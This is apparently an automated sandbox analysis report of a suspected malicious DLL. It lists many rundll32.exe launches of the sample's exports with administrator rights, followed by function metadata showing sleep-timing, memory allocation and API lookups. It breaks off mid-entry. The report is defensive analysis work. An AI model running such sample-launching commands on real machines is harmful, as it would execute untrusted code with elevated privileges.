                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:25
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkStso
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:26
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSf
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:27
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSbq
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:28
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkRrdcfn
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:29
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQulon
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:30
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQr
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:31
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQm
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:32
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkPp
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:33
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOxft
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:34
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOksgc
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:35
                            Start time:11:54:22
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOi
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:36
                            Start time:11:54:23
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOhqbhe
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:37
                            Start time:11:54:23
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOda
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:38
                            Start time:11:54:23
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNsdwzc
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:39
                            Start time:11:54:23
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNr
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:40
                            Start time:11:54:23
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNofovl
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:41
                            Start time:11:54:23
                            Start date:25/07/2024
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNlqh
                            Imagebase:0x4d0000
                            File size:61'440 bytes
                            MD5 hash:889B99C52A60DD49227C5E485A016679
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:1.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:15.2%
                              Total number of Nodes:46
                              Total number of Limit Nodes:1
                              execution_graph 20469 6cd51770 lstrcmpiW codecvt 20453 6cd54eb3 VirtualAlloc 20399 6cd51880 20400 6cd5188e 20399->20400 20402 6cd518bb 20400->20402 20403 6cd51090 20400->20403 20410 6cd51000 20403->20410 20405 6cd51098 20414 6cd68f80 20405->20414 20407 6cd510b1 20417 6cd6e330 20407->20417 20409 6cd510bb 20409->20402 20412 6cd51016 20410->20412 20411 6cd51025 GetTickCount Sleep GetTickCount 20411->20412 20412->20411 20413 6cd51055 20412->20413 20413->20405 20435 6cd69e90 20414->20435 20416 6cd68f88 20416->20407 20418 6cd6e346 20417->20418 20420 6cd6e35a 20418->20420 20442 6cd53270 20418->20442 20421 6cd53270 VirtualAlloc 20420->20421 20422 6cd6e396 20420->20422 20421->20422 20423 6cd53270 VirtualAlloc 20422->20423 20424 6cd6e3d1 20422->20424 20423->20424 20425 6cd53270 VirtualAlloc 20424->20425 20426 6cd6e40e codecvt 20424->20426 20425->20426 20446 6cd53390 GetProcAddress 20426->20446 20428 6cd6e49e codecvt 20447 6cd53390 GetProcAddress 20428->20447 20430 6cd6e524 codecvt 20448 6cd53390 GetProcAddress 20430->20448 20432 6cd6e5a9 codecvt 20449 6cd53390 GetProcAddress 20432->20449 20434 6cd6e632 codecvt 20434->20409 20436 6cd69ea7 codecvt 20435->20436 20439 6cd523f0 20436->20439 20438 6cd69f09 codecvt 20438->20416 20440 6cd5243a lstrcmpiW 20439->20440 20441 6cd523ff codecvt 20439->20441 20440->20438 20441->20440 20443 6cd53281 20442->20443 20450 6cd536c0 20443->20450 20445 6cd532af 20445->20420 20446->20428 20447->20430 20448->20432 20449->20434 20451 6cd5370a VirtualAlloc 20450->20451 20452 6cd536cf codecvt 20450->20452 20451->20445 20452->20451 20456 6cd518e0 6 API calls 20458 6cd52680 5 API calls codecvt

                              Executed Functions

                              Function 6CD51000 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID: CountTick$Sleep
                              • String ID: F$d
                              • API String ID: 4250438611-811691143
                              • Opcode ID: a098e7f8e63afde0cfcad1b01a541da313c866a3f0ed59b293527f0a8b3f9828
                              • Instruction ID: 5741d3671f550c46167cfbcedb5e4d7b338e2c59d17bfafe5065f546fc8f0359
                              • Opcode Fuzzy Hash: a098e7f8e63afde0cfcad1b01a541da313c866a3f0ed59b293527f0a8b3f9828
                              • Instruction Fuzzy Hash: 54015A30E04298EFDF04EFACCA0529DBB71FF02315F5082AAD921A2654DB75CA61EB51
                              Function 6CD51880 Relevance: .0, Instructions: 25COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 256 6cd51880-6cd5188c 257 6cd5188e-6cd518a3 256->257 258 6cd518a9-6cd518b3 256->258 257->258 259 6cd518b5-6cd518b9 258->259 260 6cd518c4 call 6cd510c0 258->260 261 6cd518bd call 6cd51090 259->261 262 6cd518bb 259->262 264 6cd518c9-6cd518d1 260->264 266 6cd518c2 261->266 262->264 266->264
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 57ae0b83bc06da084a12ea2a1f165d55f6268bd7004894f2c42e5e106f577650
                              • Instruction ID: 0f96bea7785d41292f6f3aa5a275ab1279c1903ebae1e174f5ea36758039214f
                              • Opcode Fuzzy Hash: 57ae0b83bc06da084a12ea2a1f165d55f6268bd7004894f2c42e5e106f577650
                              • Instruction Fuzzy Hash: 21F0A030A17144EBEF10CF48C502799B7FCEB4B35CF50415BD91047B68C231E960DA51
                              Function 6CD536C0 Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • VirtualAlloc.KERNELBASE(?,?,?,?,?,6CD6E40E), ref: 6CD5371A
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 18c9fd947433894486e39d4e44776a1db5a7f45d8959b56d18ff4c496b4bd0b2
                              • Instruction ID: 4f7e6e94b9f1c4ee54ddf013e898287d6fa8900d735b89b917a7d526e38606e1
                              • Opcode Fuzzy Hash: 18c9fd947433894486e39d4e44776a1db5a7f45d8959b56d18ff4c496b4bd0b2
                              • Instruction Fuzzy Hash: 6AF08975B05109BBDF00DFA4DC50F9E3BBCAB46305F414555F90567A60EB709D2887B1
                              Function 6CD523F0 Relevance: 1.3, APIs: 1, Instructions: 28stringCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrcmpiW.KERNELBASE(00000000,?,00000000,00000000), ref: 6CD52442
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID: lstrcmpi
                              • String ID:
                              • API String ID: 1586166983-0
                              • Opcode ID: a61ecba4ec507862f6c0f13b7249adf8b9d90ab2d43329e29cc70edc5bd1f5eb
                              • Instruction ID: ab44963cc35f3ed2a3e9543a8ab3320ebbcead6cbf3dcf8efc653e332c127c69
                              • Opcode Fuzzy Hash: a61ecba4ec507862f6c0f13b7249adf8b9d90ab2d43329e29cc70edc5bd1f5eb
                              • Instruction Fuzzy Hash: CDF0A775A01108ABEF509F64DC05E997778A712245F40C119B90666A60DB30556D8BA1

                              Non-executed Functions

                              Function 6CD528E0 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID: m
                              • API String ID: 0-3775001192
                              • Opcode ID: fd61c5b7c3fb3d1c6e1ce1eeddfec76ad3494625f987970e68f8b0c2a9c98443
                              • Instruction ID: 9400f4abc355b9b606dfa36941e8d8d0afbabc872ba9590905375bb92bee19bd
                              • Opcode Fuzzy Hash: fd61c5b7c3fb3d1c6e1ce1eeddfec76ad3494625f987970e68f8b0c2a9c98443
                              • Instruction Fuzzy Hash: D521C670E49244ABFF01DBB5CC55BAD3BB8AB0320CF408459D54567BA1EB31162DC7B2
                              Function 6CD52C90 Relevance: .3, Instructions: 345COMMONLIBRARYCODE
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5e1892ad7e4fc7dda663b5a1bbdcfd5af4397b97d278706df5c6e3228e46f3c4
                              • Instruction ID: 8adcfee697f6201d50e44eb6757f91f10167bde8f8e61a10de3c97f86793617b
                              • Opcode Fuzzy Hash: 5e1892ad7e4fc7dda663b5a1bbdcfd5af4397b97d278706df5c6e3228e46f3c4
                              • Instruction Fuzzy Hash: D3D17D74A09208EBDF549F70CC59EDD3BB4BF05348F80451AE40A6BBB0DB34956DCAA5
                              Function 6CD5E2F0 Relevance: .2, Instructions: 245COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 97cbd7203d191b498a102ea7784af2dd83e7596d2b3904508cb77ac6cba96286
                              • Instruction ID: ae5a13e0459ae937048b5a6aebbe2db6988076bceeb6a4ed140ce51385f7a9c0
                              • Opcode Fuzzy Hash: 97cbd7203d191b498a102ea7784af2dd83e7596d2b3904508cb77ac6cba96286
                              • Instruction Fuzzy Hash: E8C1C6B0D04159DBCF08CF99C991AEEBBB2FF98304F14815AE854AB255D334AA61CF94
                              Function 6CD5E040 Relevance: .2, Instructions: 213COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8711eb5a034fc7b91f54e85c32679345af70936d2d4dc79d77391d6a434eb62e
                              • Instruction ID: 7fa98c739000e41561a0771f63d232714507689b98dba5490e60585b22e27328
                              • Opcode Fuzzy Hash: 8711eb5a034fc7b91f54e85c32679345af70936d2d4dc79d77391d6a434eb62e
                              • Instruction Fuzzy Hash: 46B1D5B1D00259DFCF08CF99D991ADEBBB2FF98304F18815AE814AB255C334A961CF94
                              Function 6CD5E308 Relevance: .1, Instructions: 133COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0c8a9737debf7333a0f958e2089c6d762d27a878e3007d4562316f9c1ed437a3
                              • Instruction ID: db53bd7639a21f22478eab35f72028f81192deb981867871191b6a3579aceb82
                              • Opcode Fuzzy Hash: 0c8a9737debf7333a0f958e2089c6d762d27a878e3007d4562316f9c1ed437a3
                              • Instruction Fuzzy Hash: 4E5108B0D01209DBCF04CF99C981AEEBBB2FF98304F14C55AE814AB355D334AA61DB94
                              Function 6CD5E32D Relevance: .1, Instructions: 127COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 446fac22fc25e5ebe9834733f62750428f8b2cf52dc42aac7255b1b48395739d
                              • Instruction ID: 202c5bbc64701d2d352365a67458e861a538e7f17cdaadcced86d4196f3c6064
                              • Opcode Fuzzy Hash: 446fac22fc25e5ebe9834733f62750428f8b2cf52dc42aac7255b1b48395739d
                              • Instruction Fuzzy Hash: AC51F7B1D0125ADBCF04CF99C981AEEBBB2FF98304F14C55AE814AB355D334AA21DB54
                              Function 6CD56B50 Relevance: .0, Instructions: 44COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e3f5c2e39cba21bdb3dceb9b457b13817e084fe16dc31f51aa0fd7b9ef98bbbf
                              • Instruction ID: e5374d442c07babde39f7ca289159b05151d6c8dcce8ebfdee7bafcb406f5412
                              • Opcode Fuzzy Hash: e3f5c2e39cba21bdb3dceb9b457b13817e084fe16dc31f51aa0fd7b9ef98bbbf
                              • Instruction Fuzzy Hash: B3112DB4900108ABCB18DF58D891ADEF7B5EF44314F40C159E9195B751DB31EA58CBA4
                              Function 6CD56690 Relevance: .0, Instructions: 32COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 040256c1bb16222d9a274382bac21b8a2c3887b4133735738a20b1eebe1c9a83
                              • Instruction ID: 361b38f4fa081535a69c7a90a883468bb933894a533c7f1a0a34522e839284cb
                              • Opcode Fuzzy Hash: 040256c1bb16222d9a274382bac21b8a2c3887b4133735738a20b1eebe1c9a83
                              • Instruction Fuzzy Hash: 34F01474A00208ABDB08CF58C894B8EBBB5EB48318F10C199EC189F7A1D771EA55CB90
                              Function 6CD591E0 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.3965060253.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 00000000.00000002.3965019494.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965111619.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965139534.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965198382.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3965233663.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6cd50000_loaddll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3a796c32a1ce250fe0e2ef0422a22b2cdcb733c9b7f94d41a40a67be8ccbe9bf
                              • Instruction ID: f78603e8ee5f0b36acaabdba45a544244e262099d4be9ca16e4fae79b71f54a0
